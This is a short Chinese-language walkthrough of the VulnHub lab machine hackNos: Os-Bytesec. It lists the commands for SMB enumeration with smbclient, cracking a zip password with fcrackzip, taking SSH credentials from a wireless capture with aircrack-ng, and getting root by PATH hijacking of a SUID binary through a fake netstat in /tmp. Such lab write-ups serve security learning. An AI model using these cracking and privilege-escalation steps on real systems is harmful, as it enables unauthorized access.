vulnhub靶场之hackNos:Os-Bytesec
难度:中级
标记:2标记第一个用户和第二个根
学习:利用| 中小企业| 枚举 速记| 特权提升
联系…https://www.linkedin.com/in/rahulgehlaut/
我们建议您对此虚拟机使用VirtualBox而不是VMware
做了端口扫描,发现开了 80 ,139 ,445 ,2525 这里可能有SMB共享。
2525是SSH。
查看页面源代码 ,发现提示 get smb free SMB共享。
再拿MSF做SMB扫描。
这里爆出一个用户名为smb的共享用户。
在kali上用smbclient连接。
smbclient //192.168.0.107/smb -U smb
get main.txt
get safe.zip
这里看下main文件,只是一个Hello.
发现zip需要密码 用fcrackzip**。
apt-get install fcrackzip
fcrackzip -D are/wordlists/rockyou.txt -u safe.zip
这里有两个文件,这个user.cap是一个网络数据包文件,做到这里没思路了。
借鉴大佬的思路
writeup:
https://www.freebuf.com/articles/system/221949.html
需要用aircrack-ng** 无线数据包。
账号:blackjax 密码 snowflake
ssh登录
这里需要提权 ,也借鉴了大佬的思路,用PATH提权。
在find命令的帮助下不浪费时间的搜索具有SUID或4000权限的文件。
find / -perm -u=s -type f 2>/dev/null
然后我们进入/usr/bin ,./netscan
然后
cd /tmp
echo “/bin/sh” > netstat
chmod 777 netstat
echo $PATH
export PATH=/tmp:$PATH
cd /usr/bin
./netscan
whoami